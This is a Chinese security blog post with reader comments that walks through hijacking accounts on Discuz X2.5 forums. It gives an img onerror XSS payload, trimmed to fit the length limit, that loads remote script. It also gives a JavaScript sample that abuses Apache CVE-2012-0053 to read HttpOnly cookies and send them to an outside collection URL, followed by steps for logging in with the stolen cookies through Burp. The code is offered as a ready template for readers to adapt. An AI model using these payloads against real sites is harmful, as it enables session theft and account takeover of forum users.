您的位置 » 首页 » 渗透测试 » XSS利用:discuz X2.5跨站漏洞利用方法分析

XSS利用:discuz X2.5跨站漏洞利用方法分析

发表于4年前 | 作者: seay | 分类: 渗透测试 | 孵化于:2013年03月26日 | 文章热度:41,204 次 全屏阅读

显示不全请点击全屏阅读

0×01 无法用获取的COOKIE登录分析

都说DISCUZ X2.5(以下简称DZ25)的COOKIE拿到了也没有办法登录,但是为什么呢?今天就来简单的看一下,我们登录一个DZ25的站,登陆之后看下COOKIE
null
在里面我们翻下,就会发现一个HTTPONLY的字段,还是AUTH,也就是登录用户,所以当然无法直接搞到完整COOKIE,残缺的COOKIE自然无法登录
null
0×02 获取完整COOKIE条件分析

大家知道,HTTPONLY是专门用来防止XSS的,但是不要直接放弃,我们知道低版本的AJAX利用TRANCE方法和APACHE有一个CVE-2012-0053漏洞,均可以获取HTTPONLY的COOKIE

文章链接:

那么我们利用的条件就清晰了:

  1. 低版本的浏览器
  2. “或者”APACHE服务器没有补CVE-2012-0053

0×03 DZ25跨站分析

我在DZ官网下载了最新的DZ25,发现唯一没有补的洞就是在描述中插入XSS
null
这样,当点击图片时候,就会触发XSS,如下
null
当然,只是ALERT是不够的,为了触发漏洞,我们必须引用外部的JS文件,因为无论哪个条件,都需要一段AJAX脚本

如果直接引用<script src=’http://www.xxx.com/1.js’></script>会发现无法加载
null
(因为与本文关系不大,为什么不能加载这里我就不写分析了)

那怎么办呢?

不要忘了,我们还有IMG标签

我们可以使用:

<img src=x onerror=”var s=createElement(‘script’);document.body.appendChild(s);s.src=’http://localhost/1.js’;”>

这样的代码来创建一个body里面的script(为什么要这样写我就不说了,总之是这样的)

但是写进去后我们发现,太长了……是的被DZ25截断了

null

那我们来改一改,将不需要的去掉,地址换成短网址结果如下:

<img src=x onerror=s=createElement(‘script’);body.appendChild(s);s.src=’http://t.cn/z12345G’;>

插入之后刚刚好

null

加载下试试

null
null

至此,我们已经可以让dz加载外部的js了

0×04 JS编写

这个我就给个样本吧,大家改改就是了

 

这是触发apache漏洞的样本
 
查看源代码
 
 
1 makeRequest();
2
3 function setCookies (good) { 
4
5 var str = “”; 
6
7 for (var i=0; i< 819; i++) { 
8
9 str += “x”; 
10
11 }
12
13 for (i = 0; i < 10; i++) { 
14
15 if (good) { 
16
17 var cookie = “xss”+i+”=;expires=”+new Date(+new Date()-1). 
18
19 toUTCString()+”; path=/;”; 
20
21 }
22
23 else { 
24
25 var cookie = “xss”+i+”=”+str+”;path=/”; 
26
27 }
28
29 document.cookie = cookie; 
30
31 }
32
33 }
34
35 function makeRequest() { 
36
37 setCookies();
38
39 function parseCookies () { 
40
41 var cookie_dict = {}; 
42
43 if (xhr.readyState === 4 && xhr.status === 400) { 
44
45 var content = xhr.responseText.replace(/\r|\n/g,”).match 
46
47 (/
48 (.+)<\/pre>/); 
49
50 if (content.length) { 
51
52 content = content[1].replace(“Cookie: “, “”); 
53
54 var cookies = content.replace(/xss\d=x+;?/g, ”).split(/;/g); 
55
56 for (var i=0; i 
57 var s_c = cookies[i].split(‘=’,2); 
58
59 cookie_dict[s_c[0]] = s_c[1]; 
60
61 }
62
63 }
64
65 setCookies(true);
66
67 var x=new Image(); 
68
69 try
70
71 {
72
73 var myopener=”; 
74
75 myopener=window.opener && window.opener.location?window.opener.location:”; 
76
77 }
78
79 catch(err)
80
81 {
82
83 }
84
85 x.src=’http:// www.2cto.com /save.php?opener=’+JSON.stringify(cookie_dict); 
86
87 }
88
89 }
90
91 var xhr = new XMLHttpRequest(); 
92
93 xhr.onreadystatechange = parseCookies; 
94
95 xhr.open(“GET”, “httponly.php”, true); 
96
97 xhr.send(null);
98
99 }
 

0×04 COOKIE搜集

我们来看看得到的COOKIE

自己写的……界面比较丑……

可以看到,AUTH字段很好的被包裹了进去

null

但是,这是JSON格式的,我们还要做点处理,

1.将”全部去掉

2.将:换成=

3.将,换成;

最终得到如下:

null
0×05 登录

我们打开BURP,这个东西是个神器,不用我说大家都会用吧?

选上cookie然后点edit

然后UPDATE一下

null

之后设置代理为burp,burp就会自动替换头中的cookie字段

然后看下效果~~~

null

 

作者:haxsscker

 

Tags:

discuz 2.5漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/2496/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有8个筒子的人留下了脚印...

  • lulo2013 说:
    1楼
    2013 年 3 月 26 日 下午 4:26 回复

    好吧 看不懂啊 但是看帖不回又不是我的风格 所以就来水一水了啊www. lilangz.info

  • crazyrun 说:
    2楼
    2013 年 3 月 29 日 上午 11:11 回复

    请问下edit cookie+是fx插件吗?支持fx哪个版本呢?

    • 【管理员】seay 说:
      2013 年 3 月 29 日 上午 11:22 回复

      嗯,插件

      • crazyrun 说:
        2013 年 3 月 29 日 下午 3:24 回复

        支持最新版本的fx吗?有人说高版本的不支持

        • 【管理员】seay 说:
          2013 年 3 月 29 日 下午 7:09 回复

          嗯,支持,http://www.cnseay.com/631/

  • dk 说:
    3楼
    2013 年 3 月 29 日 下午 6:55 回复

    phpwind抓取到COOKIES也编辑嘛?刚接触XSS!

    • 【管理员】seay 说:
      2013 年 3 月 29 日 下午 7:09 回复

      。。。

  • heise 说:
    4楼
    2013 年 4 月 9 日 下午 7:40 回复

    新手弱弱的问下怎么改?哪些地方需要改?求解。如果方便,请发我邮箱,thk

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)